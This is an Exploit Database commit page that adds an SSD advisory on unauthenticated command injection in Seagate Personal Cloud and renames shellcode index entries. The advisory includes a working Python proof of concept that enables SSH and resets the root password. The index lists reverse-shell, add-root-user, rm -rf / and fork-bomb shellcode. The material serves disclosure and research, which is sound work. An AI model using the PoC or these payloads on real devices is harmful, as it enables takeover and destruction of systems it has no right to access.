Linux/x86 - execve /bin/sh Shellcode (21 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)
Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)

Linux/x86 - execve /bin/sh Shellcode (24 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)

Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)
This commit is contained in:
Offensive Security 2018-01-17 05:02:19 +00:00
parent 50c008ba06
commit 909c94ce89
64 changed files with 3052 additions and 199 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

134
exploits/hardware/remote/43659.md Normal file
View file

@ -0,0 +1,134 @@
# SSD Advisory Seagate Personal Cloud Multiple Vulnerabilities
## Vulnerabilities summary
The following advisory describes two (2) unauthenticated command injection vulnerabilities.
Seagate Personal Cloud Home Media Storage is “the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.”
## Credit
An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory
## Vulnerabilities details
Seagate Media Server uses Django web framework and is mapped to the .psp extension.
Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.
/etc/lighttpd/conf.d/django-host.conf:
```
fastcgi.server += (
".psp"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
)),
".psp/"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
))
)
```
URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.
Two views were found to be affected by unauthenticated command injection.
The affected views are:
- uploadTelemetry
- getLogs
These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module.
This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.
/usr/lib/django_host/seagate_media_server/views.py:
```
@csrf_exempt
def uploadTelemetry(request):
ts = request.GET.get('TimeStamp','')
if (checkDBSQLite()) :
response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
else :
if ts == "":
response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
return HttpResponse(response);
cmd = "/usr/local/bin/log_telemetry "+str(ts)
commands.getoutput(cmd)
return HttpResponse('{"stat":"ok"}')
```
/usr/lib/django_host/seagate_media_server/views.py:
```
@csrf_exempt
def getLogs (request):
try:
cmd_base='/usr/bin/log-extract-manager.sh'
uID = request.GET.get ( 'arch_id', None )
time_stamp = request.GET.get ( 'time_stamp', '' )
if uID:
(status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
if ('In progress' in output) and (uID in output) :
return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
elif (status == 0) :
return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
else :
return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
else:
(status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
if (status == 0) :
return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
except :
return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
```
Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.
### Proof of Concept
The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.
```
#!/usr/bin/env python
import os
import urllib
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
cmds = ['ngc --start sshd 2>&1',
'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
for cmd in cmds:
print 'Running command', repr(cmd)
cmd = urllib.quote_plus(cmd)
r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
print r.read()
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
```

3
files_exploits.csv
View file

@ -5247,7 +5247,7 @@ id,file,description,date,author,type,platform,port
40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android,
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx,
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows,
43596,exploits/windows/dos/43596.py,"OBS studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -15813,6 +15813,7 @@ id,file,description,date,author,type,platform,port
43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471

Can't render this file because it is too large.

400
files_shellcodes.csv
View file

@ -1,47 +1,47 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
13241,shellcodes/aix/13241.c,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86
13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86
13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86
13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86
13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86
13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86
13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86
13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86
13274,shellcodes/freebsd_x86/13274.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (37 bytes)",2004-09-26,preedator,shellcode,freebsd_x86
13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",shellcode,freebsd_x86
13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64
13281,shellcodes/generator/13281.c,"Linux/x86 - execve() Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator
13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13283,shellcodes/generator/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator
13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator
13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator
13288,shellcodes/generator/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,shellcode,generator
@ -50,27 +50,27 @@ id,file,description,date,author,type,platform
13291,shellcodes/hardware/13291.txt,"Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13292,shellcodes/hardware/13292.txt,"Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Varun Uppal",shellcode,hardware
13293,shellcodes/hardware/13293.txt,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware
13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13295,shellcodes/hp-ux/13295.txt,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux
13296,shellcodes/linux_x86-64/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64
13297,shellcodes/generator/13297.c,"Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator
13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13299,shellcodes/linux_mips/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes)",2008-08-18,vaicebine,shellcode,linux_mips
13300,shellcodes/linux_mips/13300.c,"Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes)",2005-11-09,core,shellcode,linux_mips
13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13301,shellcodes/linux_ppc/13301.c,"Linux/PPC - execve(/bin/sh) Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13302,shellcodes/linux_ppc/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13303,shellcodes/linux_ppc/13303.c,"Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",shellcode,linux_ppc
13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
13304,shellcodes/linux_ppc/13304.c,"Linux/PPC - execve(/bin/sh) Shellcode (112 bytes)",2004-09-12,Palante,shellcode,linux_ppc
13305,shellcodes/linux_sparc/13305.c,"Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)",2004-09-26,killah,shellcode,linux_sparc
13306,shellcodes/linux_sparc/13306.c,"Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)",2004-09-12,killah,shellcode,linux_sparc
13307,shellcodes/linux_x86/13307.c,"Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13307,shellcodes/linux_x86/13307.c,"Linux/x86 - /bin/sh + Self-Modifying Anti-IDS Shellcode (35/64 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13308,shellcodes/linux_x86/13308.c,"Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)",2009-09-15,XenoMuta,shellcode,linux_x86
13309,shellcodes/linux_x86/13309.asm,"Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)",2009-09-09,XenoMuta,shellcode,linux_x86
13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13310,shellcodes/linux_x86/13310.c,"Linux/x86 - Disable Network Card + Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",shellcode,linux_x86
13311,shellcodes/linux_x86/13311.c,"Linux/x86 - killall5 + Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13312,shellcodes/linux_x86/13312.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",shellcode,linux_x86
13313,shellcodes/linux_x86/13313.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,shellcode,linux_x86
13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
13314,shellcodes/linux_x86/13314.c,"Linux/x86 - reboot() + Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",shellcode,linux_x86
13315,shellcodes/linux_x86/13315.c,"Linux/x86 - chmod 666 /etc/shadow + Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",shellcode,linux_x86
13316,shellcodes/linux_x86/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,shellcode,linux_x86
13317,shellcodes/linux_x86/13317.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
13318,shellcodes/linux_x86/13318.s,"Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",shellcode,linux_x86
@ -101,31 +101,31 @@ id,file,description,date,author,type,platform
13343,shellcodes/linux_x86/13343.asm,"Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)",2007-04-02,mu-b,shellcode,linux_x86
13344,shellcodes/linux_x86/13344.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13345,shellcodes/linux_x86/13345.c,"Linux/x86 - Kill All Processes Shellcode (11 bytes)",2007-03-09,"Kris Katterjohn",shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13346,shellcodes/linux_x86/13346.s,"Linux/x86 - execve() Read Shellcode (92 bytes)",2006-11-20,0ut0fbound,shellcode,linux_x86
13347,shellcodes/linux_x86/13347.c,"Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13348,shellcodes/linux_x86/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13349,shellcodes/linux_x86/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13350,shellcodes/linux_x86/13350.c,"Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13351,shellcodes/linux_x86/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13352,shellcodes/linux_x86/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",shellcode,linux_x86
13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve /bin/sh Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve /bin/sh Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13353,shellcodes/linux_x86/13353.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (28 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13354,shellcodes/linux_x86/13354.c,"Linux/x86 - execve(/bin/sh) Shellcode (22 bytes)",2006-11-16,Revenge,shellcode,linux_x86
13355,shellcodes/linux_x86/13355.c,"Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)",2006-10-22,izik,shellcode,linux_x86
13356,shellcodes/linux_x86/13356.c,"Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)",2006-08-02,bunker,shellcode,linux_x86
13357,shellcodes/linux_x86/13357.c,"Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13358,shellcodes/linux_x86/13358.c,"Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13359,shellcodes/linux_x86/13359.c,"Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13360,shellcodes/linux_x86/13360.c,"Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid() Shellcode (96 bytes)",2006-07-20,"Marco Ivaldi",shellcode,linux_x86
13361,shellcodes/linux_x86/13361.c,"Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)",2006-07-04,oveRet,shellcode,linux_x86
13362,shellcodes/linux_x86/13362.c,"Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,shellcode,linux_x86
